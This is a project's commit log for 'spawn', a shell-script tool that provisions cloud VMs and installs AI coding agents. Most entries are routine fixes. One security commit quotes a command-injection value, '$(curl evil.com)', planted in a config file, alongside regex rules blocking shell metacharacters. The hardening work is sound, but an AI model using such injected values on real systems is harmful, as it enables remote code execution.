works with defaults) - agent_save_connection: convenience JSON for spawn list - agent_pre_launch: gateway daemons, startup hooks - agent_pre_provision: pre-provision prompts - .spawnrc shell hooks: hooking env vars into .bashrc/.zshrc These now log warnings and continue instead of aborting. Critical steps (cloud_authenticate, agent_install, cloud_provision) still exit on failure. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: audit and fix env vars, escaping, and error handling across all agents Audit findings from 3 parallel agents, fixes applied: Env vars (4 agents fixed across 9 clouds each = 36 scripts): - Amazon Q: remove fake OPENAI_* vars (Q uses AWS auth, can't use OpenRouter) - Cline: replace OPENAI_* env vars with `cline auth -p openrouter` command - Open Interpreter: drop OPENAI_* vars, use only OPENROUTER_API_KEY (native support via --model flag) - NanoClaw: add ANTHROPIC_BASE_URL to .env file (was missing, requests went to Anthropic directly) Escaping: - execute_agent_non_interactive: replace printf '%q' with single-quote wrapping to avoid double-escaping on Fly.io Manifest updated for amazonq, cline, interpreter entries. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: use setsid to detach openclaw gateway daemon from SSH sessions The gateway daemon launch (`nohup openclaw gateway ... & disown`) hangs on all clouds because SSH/exec channels wait for child FDs to close. setsid creates a new session, fully detaching the daemon so the channel can close immediately. Falls back to nohup where setsid is unavailable. Consolidates the daemon launch into a shared start_openclaw_gateway() function used by all 9 cloud scripts. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: configure npm global prefix for non-root clouds (AWS, GCP, OVH) AWS Lightsail, GCP, and OVH SSH as non-root users (ubuntu/login user), so `npm install -g` fails with EACCES on /usr/local/lib/node_modules/. Fix: configure npm prefix to ~/.npm-global during cloud-init/setup and add ~/.npm-global/bin to the SSH PATH prefix so agent install commands find globally-installed npm binaries without sudo. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: remove broken OpenRouter routing from Gemini CLI scripts Gemini CLI uses Google's native API format (/v1beta/models/:streamGenerateContent), not the OpenAI-compatible format (/v1/chat/completions). No base URL override can bridge this — the request formats are fundamentally incompatible. Same situation as Amazon Q (uses vendor-specific auth/API). Removed GEMINI_API_KEY and GOOGLE_GEMINI_BASE_URL from all 9 scripts + manifest. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: auto-install AWS CLI and gcloud SDK when missing Instead of printing manual install instructions and exiting, both CLIs now auto-install: - AWS: downloads official .pkg (macOS) or .zip (Linux) installer - GCP: uses brew cask on macOS, Google's tarball installer on Linux Falls back to manual instructions if auto-install fails. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: nanoclaw — install Docker on Linux, fix hardcoded /root/ path Two issues broke NanoClaw on all clouds: 1. .env upload hardcoded /root/nanoclaw/.env — fails on non-root clouds (AWS=ubuntu, GCP=user, OVH=ubuntu). Now uses upload_config_file with $HOME which expands on the remote side. 2. NanoClaw requires a container runtime. On Linux it uses Docker, but Docker was never installed. Added Docker install via get.docker.com to all cloud scripts (with sudo where SSH user is non-root). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address security review findings from PR #1463 - Reject symlinked github-auth.sh before base64-encoding (falls back to remote URL) - Hide API key from process list using curl -K - instead of -H in verify_openrouter_key Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: quote OPENROUTER_API_KEY in cline auth to prevent command injection Unquoted variable in `cline auth -p openrouter -k ${OPENROUTER_API_KEY}` allows shell metacharacters in the key to execute arbitrary commands on the remote server. Wrapping in escaped double quotes prevents expansion. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-19 08:36:24 -05:00
A	b603e05043	fix: remove duplicate API key + model selection in spawn_agent() (#1462 ) Steps 3-4 (get_or_prompt_api_key and model selection) were executed twice in spawn_agent() -- once before provisioning and once after. This caused redundant HTTP validation calls to openrouter.ai/api for every agent deployment (~130+ scripts use spawn_agent). The duplicate step numbering in comments (3,4,5 then 4,5,6) confirms this was accidental. Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-19 06:23:55 -05:00
Ahmed Abushagur	be904cbe1c	fix: install_agent double-escaping + github-auth reliability (#1460 ) * docs: add spawn delete command to README Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: harden openclaw across all clouds — validation, reliability, performance Fixes multiple issues causing openclaw to break on most clouds: Bugs fixed: - Double-prefixed model ID (openrouter/openrouter/auto) in config generation - AWS gateway starting without env vars (missing .zshrc source) - DigitalOcean sourcing .spawnrc instead of .zshrc for gateway - Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p) Validation added: - API key checked against OpenRouter /auth/key endpoint with re-prompt on failure - Model ID verified against OpenRouter model list with re-prompt loop - openrouter/auto and openrouter/free bypass model check Reliability improvements: - Standardized gateway launch with </dev/null & disown across all 9 clouds - Gateway log auto-displayed on startup timeout for diagnostics - 2GB swap added to cloud-init to prevent OOM on small VMs - Portable install timeout (10 min) with macOS gtimeout fallback Performance: - Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s) - Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw - Fly.io: tries bun first (faster), falls back to npm Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: skip sudo in gh install when running as root (Fly.io containers) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id - verify_openrouter_key and verify_openrouter_model skip network calls when SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set - install_agent timeout wrapper now quotes the escaped command for defense in depth - model_id in openclaw JSON now uses json_escape() for consistency Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: remove double-escaping in install_agent that broke shell operators install_agent() was wrapping commands with printf '%q' + bash -c before passing them to the run callback. But run callbacks (run_server, run_sprite, ssh_run_server) already handle escaping for remote transport. The double- escaping turned && \|\| > \| into literal characters, causing 'source' to treat the entire command as a single filename. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: use local github-auth.sh instead of curling from main When running from a local checkout, base64-encode the local github-auth.sh and send it inline to the remote machine. This ensures fixes (like the sudo skip for root) take effect immediately without waiting for a merge to main. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: handle github-auth errors gracefully instead of terminating GitHub CLI setup is optional — failures should not abort the spawn session. Guard both run_callback calls in offer_github_auth with \|\| log_warn so the script continues even if gh install fails. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: use GOOGLE_GEMINI_BASE_URL to route Gemini CLI through OpenRouter Gemini CLI ignores OPENAI_BASE_URL — it uses GEMINI_API_KEY to talk directly to Google's API. The OpenRouter key is not a valid Google API key, so all requests fail with "API key not valid". Use GOOGLE_GEMINI_BASE_URL to redirect Gemini CLI to OpenRouter's endpoint. Fixes all 9 cloud gemini scripts + manifest.json. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: guard optional spawn_agent hooks so failures don't kill the session With set -eo pipefail, any unguarded failure terminates the script. Several optional operations in spawn_agent were unguarded: - agent_configure: config file uploads (agent works with defaults) - agent_save_connection: convenience JSON for spawn list - agent_pre_launch: gateway daemons, startup hooks - agent_pre_provision: pre-provision prompts - .spawnrc shell hooks: hooking env vars into .bashrc/.zshrc These now log warnings and continue instead of aborting. Critical steps (cloud_authenticate, agent_install, cloud_provision) still exit on failure. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-19 05:21:55 -05:00
Ahmed Abushagur	159ad49fec	fix: harden openclaw across all clouds (#1456 ) * docs: add spawn delete command to README Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: harden openclaw across all clouds — validation, reliability, performance Fixes multiple issues causing openclaw to break on most clouds: Bugs fixed: - Double-prefixed model ID (openrouter/openrouter/auto) in config generation - AWS gateway starting without env vars (missing .zshrc source) - DigitalOcean sourcing .spawnrc instead of .zshrc for gateway - Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p) Validation added: - API key checked against OpenRouter /auth/key endpoint with re-prompt on failure - Model ID verified against OpenRouter model list with re-prompt loop - openrouter/auto and openrouter/free bypass model check Reliability improvements: - Standardized gateway launch with </dev/null & disown across all 9 clouds - Gateway log auto-displayed on startup timeout for diagnostics - 2GB swap added to cloud-init to prevent OOM on small VMs - Portable install timeout (10 min) with macOS gtimeout fallback Performance: - Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s) - Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw - Fly.io: tries bun first (faster), falls back to npm Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: skip sudo in gh install when running as root (Fly.io containers) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id - verify_openrouter_key and verify_openrouter_model skip network calls when SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set - install_agent timeout wrapper now quotes the escaped command for defense in depth - model_id in openclaw JSON now uses json_escape() for consistency Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: remove double-escaping in install_agent that broke shell operators install_agent() was wrapping commands with printf '%q' + bash -c before passing them to the run callback. But run callbacks (run_server, run_sprite, ssh_run_server) already handle escaping for remote transport. The double- escaping turned && \|\| > \| into literal characters, causing 'source' to treat the entire command as a single filename. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-19 09:25:48 +00:00
A	ae4aa90bb2	fix: gh CLI setup on remote VMs — pass local token through (#1444 ) Fixes GitHub CLI authentication on remote VMs by passing local token through to remote installation script. Uses printf '%q' for safe shell escaping to prevent command injection.	2026-02-18 18:22:33 +00:00
A	56fda1435a	feat: collect all auth prompts before server provisioning (#1445 ) Move OpenRouter OAuth and model selection prompts to run BEFORE server provisioning in spawn_agent(). Previously the user had to wait for the server to spin up before being prompted for their API key and model choice. Now all interactive prompts (GitHub auth, OpenRouter OAuth, model selection) happen upfront, then the server provisions without further user interaction. Co-authored-by: lab <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>	2026-02-18 09:54:51 -08:00
A	f3ffb6caed	fix: broken error message in multi-creds validation, predictable temp path (#1442 ) 1. _multi_creds_validate referenced undefined help_url variable, causing empty "Get new credentials from: " error messages when OVH credential validation fails. Added help_url as parameter and pass it from caller. 2. _spawn_inject_env_vars (used by 130+ agent scripts via spawn_agent) uploaded credentials to static /tmp/env_config path. The older inject_env_vars_ssh/inject_env_vars_cb functions document this as a symlink attack vector and use randomized paths. Fixed to match. 3. Removed dead inject_env_vars_fly and inject_env_vars_sprite functions (all agent scripts now use spawn_agent -> _spawn_inject_env_vars). Agent: code-health Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-18 07:51:28 -05:00
Ahmed Abushagur	f2795a6d84	fix: Node.js v22 upgrade, aider uv install, SSH & cloud reliability (#1440 ) * fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds aider-chat on Python 3.13 fails with `ImportError: cannot import name '_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved — those releases have no Python 3.13 binary wheels, so the C extension is missing at runtime. Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>` and single quotes get mangled by `printf '%q'` in run_server before the command reaches the remote machine) with `--upgrade`, which forces all transitive deps including Pillow to their latest compatible versions. Also adds a plain-text echo before the install so users see progress instead of a silent hang during the 2-4 minute install. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * test: update aider/gptme/interpreter assertions from pip to uv The install method for aider, gptme, and open-interpreter was changed from pip to `uv tool install` across all clouds. The mock test assertions still checked for the old `pip.install.` patterns, causing 9 failures (3 agents × 3 clouds). Update patterns to match the actual `uv tool install` commands now used in all cloud scripts. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * ci: trigger test run for uv assertion fix * fix: prevent SSH hangs, restore stderr, fix command escaping across clouds - Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH stdin theft causing sequential install/verify/configure steps to hang - Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default SSH_OPTS so long-running installs don't silently drop on flaky networks - Remove 2>/dev/null from Fly.io run_server so remote command errors are no longer silently swallowed (--quiet flag still suppresses flyctl noise) - Fix Fly.io printf '%q' double-quoting: remove extra quotes around $escaped_cmd that prevented the remote shell from consuming escapes, breaking && \|\| \| operators in commands - Remove broken printf '%q' from Daytona run_server and interactive_session where it escaped shell operators into literal characters since daytona exec has no intermediate shell layer - Pin aider to --python 3.12 instead of --with audioop-lts across all clouds Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: add --pty to fly ssh console for interactive sessions fly ssh console -C does not allocate a pseudo-terminal by default, causing interactive TUI agents (aider, claude) to fail with "Input is not a terminal (fd=0)" or completely unresponsive input. Adding --pty forces PTY allocation, matching how other clouds handle interactive sessions (SSH uses -t, Sprite uses -tty). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: prepend ~/.local/bin to PATH in ssh_run_server After uv installs to ~/.local/bin, the current shell session doesn't have it in PATH, causing "uv: command not found" on DigitalOcean and all other SSH-based clouds (Hetzner, AWS, GCP, OVH). Fly.io's run_server already prepends this PATH — now the shared ssh_run_server does the same, fixing all SSH-based clouds at once. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: add Node.js to cloud-init for all cloud providers npm-based agents (codex, kilocode, etc.) fail with "npm: command not found" because Node.js isn't installed during cloud-init. Fly.io was the only provider installing Node.js (in wait_for_cloud_init). Now all cloud-init scripts install Node.js v22 LTS from nodesource, matching Fly.io's setup. Also adds ~/.local/bin to PATH in AWS and GCP cloud-init (was already in shared/DigitalOcean/Hetzner). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: use apt packages for nodejs/npm instead of nodesource The nodesource setup script (setup_22.x) runs its own apt-get update and repository configuration, nearly doubling cloud-init time and causing hangs on DigitalOcean. Ubuntu 24.04 includes nodejs and npm in its default repos — just add them to the packages list. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: add timeouts and better error handling to Daytona CLI commands Daytona CLI commands (login, list, create) can hang indefinitely when the API is slow or unreachable. This causes: - "Failed to create sandbox: timeout" with no recovery - Token validation timeouts misreported as "invalid token" - Users re-entering valid tokens that also timeout Fixes: - Wrap all daytona CLI calls with timeout (30s for auth, 120s for create) - Detect timeout errors separately from auth errors - Show actionable "try again / check status" messages for timeouts - Add nodejs/npm to Daytona wait_for_cloud_init Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: set DAYTONA_API_URL to Daytona Cloud by default The Daytona CLI may default to connecting to a local self-hosted server instead of Daytona Cloud. Without DAYTONA_API_URL set to https://app.daytona.io/api, every CLI command (login, list, create) hangs trying to reach a non-existent local server and times out. The SDK documents this as the default, but the CLI doesn't always pick it up — now we export it explicitly. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: symlink n-installed Node.js v22 over apt v18 to prevent shadowing n installs Node.js v22 to /usr/local/bin/node but apt's v18 at /usr/bin/node can shadow it in non-interactive SSH sessions. After n 22, symlink the new binaries over the apt ones so v22 is always resolved. Also fix hcloud CLI token extraction for new TOML format. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address security review, add curl timeouts to trigger workflows - Fix ssh_run_server command injection concern: use single-quoted path_prefix so $HOME/$PATH expand remotely, not locally - Add --connect-timeout 15 --max-time 30 to trigger workflows to prevent 5-min hangs when server streams responses - Handle 409 (dedup) as success — expected when cron fires every 15min but cycles take 35min - Reduce workflow timeout-minutes from 5 to 2 Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-18 06:54:07 -05:00
Ahmed Abushagur	db4aaa0c73	fix: prevent SSH hangs, fix command escaping, pin Python 3.12 for aider (#1439 ) * fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds aider-chat on Python 3.13 fails with `ImportError: cannot import name '_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved — those releases have no Python 3.13 binary wheels, so the C extension is missing at runtime. Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>` and single quotes get mangled by `printf '%q'` in run_server before the command reaches the remote machine) with `--upgrade`, which forces all transitive deps including Pillow to their latest compatible versions. Also adds a plain-text echo before the install so users see progress instead of a silent hang during the 2-4 minute install. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * test: update aider/gptme/interpreter assertions from pip to uv The install method for aider, gptme, and open-interpreter was changed from pip to `uv tool install` across all clouds. The mock test assertions still checked for the old `pip.install.` patterns, causing 9 failures (3 agents × 3 clouds). Update patterns to match the actual `uv tool install` commands now used in all cloud scripts. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * ci: trigger test run for uv assertion fix * fix: prevent SSH hangs, restore stderr, fix command escaping across clouds - Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH stdin theft causing sequential install/verify/configure steps to hang - Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default SSH_OPTS so long-running installs don't silently drop on flaky networks - Remove 2>/dev/null from Fly.io run_server so remote command errors are no longer silently swallowed (--quiet flag still suppresses flyctl noise) - Fix Fly.io printf '%q' double-quoting: remove extra quotes around $escaped_cmd that prevented the remote shell from consuming escapes, breaking && \|\| \| operators in commands - Remove broken printf '%q' from Daytona run_server and interactive_session where it escaped shell operators into literal characters since daytona exec has no intermediate shell layer - Pin aider to --python 3.12 instead of --with audioop-lts across all clouds Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: add --pty to fly ssh console for interactive sessions fly ssh console -C does not allocate a pseudo-terminal by default, causing interactive TUI agents (aider, claude) to fail with "Input is not a terminal (fd=0)" or completely unresponsive input. Adding --pty forces PTY allocation, matching how other clouds handle interactive sessions (SSH uses -t, Sprite uses -tty). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-18 04:23:15 -05:00
Ahmed Abushagur	d9e6d058e0	fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds (#1436 ) aider-chat on Python 3.13 fails with `ImportError: cannot import name '_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved — those releases have no Python 3.13 binary wheels, so the C extension is missing at runtime. Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>` and single quotes get mangled by `printf '%q'` in run_server before the command reaches the remote machine) with `--upgrade`, which forces all transitive deps including Pillow to their latest compatible versions. Also adds a plain-text echo before the install so users see progress instead of a silent hang during the 2-4 minute install. Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-02-18 03:21:59 -05:00
Ahmed Abushagur	633ce8eaac	feat: upgrade default server sizes, fix Fly.io agent installs, improve E2E tests (#1428 ) - Upgrade default VM sizes across clouds for better agent performance: - Hetzner: cpx11 → cx23 (with cx22 fallback support for deprecated types) - DigitalOcean: s-2vcpu-2gb → s-2vcpu-4gb - Daytona: 2048MB → 4096MB memory - Oracle: VM.Standard.E2.1.Micro → VM.Standard.A1.Flex - OVH: d2-2 → d2-4 - Fix Fly.io agent failures: - Add Node.js + build-essential to wait_for_cloud_init (fixes npm-based agents) - Prepend PATH in interactive_session (fixes "source not found" errors) - Fix openclaw installs across clouds: use explicit PATH export instead of source - Fix DigitalOcean token validation (check "uuid" not "id") - Fix AWS cloud-init: chown .bashrc/.zshrc to ubuntu user - Improve Hetzner fallback: add "cheapest available" as last-resort fallback - Upgrade E2E tests: per-combo auto-fix, credential collection, robustness fixes Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-17 22:17:08 -08:00
Ahmed Abushagur	22b6a402f4	feat: E2E test harness, QA pipeline integration, macOS compat linter (#1425 ) * feat: add QA upgrade — macOS compat linter, per-agent mock assertions Layer 1: macOS compat linter (test/macos-compat.sh) - 12 rules (MC001–MC012) catching bash 3.2 incompatibilities - Detects: base64 -w0 file args, non-portable echo flags, source <(), ((var++)), read -d, nounset flag, sed -i, date %N, local -n, declare -A, ${var,,}, and \|& - Added to CI lint.yml in warn-only mode for burn-in - Integrated as Phase 0.5 in qa-dry-run.sh Layer 2: Per-agent mock assertions - test/fixtures/_shared_agent_assertions.sh with install checks for all 15 agents (claude, openclaw, aider, goose, etc.) - Integrated into test/mock.sh via _run_agent_assertions() Also includes branch fixes: - Fix base64 -w0 to use stdin redirect (aws, daytona, fly) - Fix fly/openclaw to use npm install instead of broken curl\|bash Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: add E2E test harness and integrate into QA pipeline Add test/e2e.sh — a full E2E test harness that provisions real servers, installs agents, and verifies setup across all clouds. Features: - Smoke test (one canary agent per cloud) and full matrix modes - Credential auto-detection for 8 clouds - Per-cloud preflight validation (sequential) then parallel agent tests - Stale server cleanup, timing history, cross-cloud comparison - Auto-fix and optimization phases via Claude agents - macOS bash 3.2 compatible Integrate E2E as Phase 5 in both qa-cycle.sh and qa-dry-run.sh: - Runs after mock tests pass, gated on cloud credentials - Phase 5b auto-fixes failures using per-agent worktree branches - Parses results and includes in QA summary Also fixes: - shared/common.sh: honour SPAWN_NON_INTERACTIVE=1 in safe_read() - aws/lib/common.sh: fix SSH key import (use cat instead of base64, handle race condition on concurrent imports) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-17 20:41:07 -05:00
A	266fdd9a1d	security: prevent command injection in key-request.sh env var loading (#1415 ) * security: prevent command injection in key-request.sh env var loading Fixes #1405 Why: The _try_load_env_var function loaded API tokens from ~/.config/spawn/{cloud}.json without validating the value for shell metacharacters. If an attacker could write malicious config files (e.g., {"HCLOUD_TOKEN": "$(curl evil.com)"}), the injected commands would execute when the variable was later used in unquoted contexts. Changes: - Added regex validation in _try_load_env_var (line 88-91) to reject values containing shell metacharacters: ; ' " < > \| & $ ` \ ( ) - Matches the same pattern used in validate_api_token() from shared/common.sh - Now returns error and logs security warning if malicious characters detected Impact: Blocks command injection attacks via config file poisoning. API tokens must now be clean alphanumeric strings (as they should be from legitimate providers). Agent: security-auditor Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com> * security: strengthen key-request.sh regex to block all shell metacharacters Address security review feedback from PR #1415. Changes: - Replace blocklist regex with whitelist: `^[a-zA-Z0-9._/@-]+$` - Now blocks `!`, `{`, `}`, `#`, newlines, tabs, and all other metacharacters - Update comment to clarify defense-in-depth purpose - Change error message to match validate_api_token() pattern Why whitelist approach: API tokens from legitimate cloud providers only contain alphanumeric characters plus safe chars (-, _, ., /, @). Whitelist is more robust than trying to enumerate all dangerous shell metacharacters. -- pr-maintainer --------- Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-17 13:53:49 -05:00
A	aff3b73850	security: fix medium/low findings from scan (#1395 ) * security: fix medium severity findings from scan #763 Addresses remaining medium-severity security findings from issue #763: 1. Path traversal in invalidate_cloud_key (shared/key-request.sh) - Removed dots from provider name validation regex - Changed from ^[a-z0-9][a-z0-9._-]{0,63}$ to ^[a-z0-9][a-z0-9_-]{0,63}$ - Prevents path traversal via sequences like "foo..bar" 2. Background process timeout (shared/key-request.sh) - Wrapped fire-and-forget key request in timeout 15s - Prevents leaked subprocess if curl hangs beyond --max-time 3. Rate limiting IP spoofing (.claude/skills/setup-agent-team/key-server.ts) - Switched from x-forwarded-for header to server.requestIP(req) - Uses actual connection IP instead of spoofable header Agent: security-auditor Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com> * fix: add macOS portability for timeout command Address review feedback from security team - timeout command is not available on macOS by default. Added fallback pattern that: - Uses timeout on Linux (prevents subprocess leak) - Falls back to curl --max-time only on macOS This ensures request_missing_cloud_keys() works on both platforms. Agent: pr-maintainer Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com> * security: fix command injection vulnerability in key-request.sh Fixes the critical command injection vulnerability identified in security review. Changes: - Use positional parameters ($1, $2, $3) instead of variable interpolation in bash -c - Pass variables via -- delimiter to prevent shell escaping issues - Replace echo with printf for proper formatting (macOS bash 3.x compat) - Maintain timeout wrapper on Linux and curl --max-time fallback on macOS Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com> --------- Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-17 09:29:20 -05:00
A	7544dd0dcb	feat(cli): add spawn name for each run (#1397 ) Implements spawn name feature (#1372) to improve UX: - Add optional spawn name prompt in interactive mode - Pass spawn name via SPAWN_NAME env var to shell scripts - Shell scripts use spawn name as default for resource names - Store spawn name in history for future reference - Bump CLI version to 0.4.0 The spawn name is prompted before agent/cloud selection and automatically used as the default for platform-specific resource names (server name on Hetzner, sprite name on Sprite, etc.). Agent: ux-engineer Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-17 08:05:17 -05:00
Ahmed Abushagur	14d36d1e1d	fix: Fly.io SSH reliability and app name UX (#1388 ) * fix: re-prompt on taken Fly.io app names + timeout run_server Two fixes for Fly.io UX: 1. When app name is globally taken by another user, re-prompt instead of failing. Returns exit code 2 from _fly_create_app so create_server can loop with a new name. 2. run_server now has a 5-minute timeout (portable, no coreutils needed) to prevent indefinite hangs like the 3-hour SSH session stall. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: wait for SSH before installing tools on Fly.io The previous wait_for_cloud_init immediately ran apt-get via fly ssh console on a machine that wasn't SSH-reachable yet, causing indefinite hangs. Now: 1. _fly_wait_for_ssh polls with a 30s-timeout echo until SSH responds 2. Shows progress at each step instead of suppressing all output 3. Each run_server call has an explicit timeout (10min for apt, 2min for bun, 30s for PATH exports) 4. Retries package install once on timeout Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: run fly ssh console in foreground, not background fly ssh console breaks when backgrounded with & — it needs a foreground process to establish the connection. Reverted to foreground execution and use timeout/gtimeout when available (Linux/CI). On macOS where timeout isn't available, the user can Ctrl+C hung commands. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: ensure bun PATH is available in non-interactive fly ssh sessions Ubuntu's default .bashrc returns early for non-interactive shells, so "source ~/.bashrc && bun install -g openclaw" silently fails — the PATH line at the bottom of .bashrc is never reached. Fix by prepending ~/.bun/bin to PATH in run_server() so all remote commands have access to tools installed during wait_for_cloud_init. Also fix spawn_agent to explicitly handle agent_install failure instead of relying on set -e (which exits silently). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-17 05:54:34 -05:00
Ahmed Abushagur	999751537d	fix: validate saved tokens + handle FlyV1 auth scheme (#1386 ) * fix: validate saved API tokens before use Tokens loaded from config files (e.g. ~/.config/spawn/fly.json) were never validated, so expired or revoked tokens would silently pass through and only fail at the point of use (e.g. app creation). Now the provider's test function runs on config-file tokens too, falling through to a fresh prompt if validation fails. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: handle FlyV1 token auth scheme for Fly.io Machines API Fly.io dashboard tokens use the format "FlyV1 fm2_..." where "FlyV1" is the authorization scheme itself, not a Bearer token prefix. The script was always sending "Authorization: Bearer FlyV1 fm2_..." which the API rejects with "token validation error". Now detects FlyV1-prefixed tokens and sends them as "Authorization: FlyV1 fm2_..." using custom auth headers. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: make refactor service actually run reliably Three fixes for the refactor workflow that was producing zero PRs: 1. community-coordinator: Gemini → Sonnet — Gemini doesn't support the Task tool, causing a respawn on every single cycle 2. Monitoring loop: replace "sleep 5" (which drifted to sleep 30) with explicit short-sleep instructions and CRITICAL rule that every turn must include a tool call to stay alive 3. Lifecycle management: explicit shutdown sequence with retry, preventing early exit that orphans teammates Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>	2026-02-17 04:31:46 -05:00
A	f412fb69bc	ux: wait for OpenClaw gateway to be ready before launching TUI (#1385 ) Fixes #1354 - users experienced a ~30s delay with "gateway not connected" errors when trying to use OpenClaw immediately after launch. Root cause: gateway takes time to bind to port 18789, but TUI launched after only 2 seconds. Solution: Add wait_for_openclaw_gateway() helper that polls the gateway port (max 30s) before launching TUI, ensuring immediate usability. Changes: - shared/common.sh: Add wait_for_openclaw_gateway() function - All openclaw.sh scripts (10 files): Replace sleep 2 with gateway readiness check Agent: ux-engineer Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-17 03:49:53 -05:00

1 2 3 4

195 commits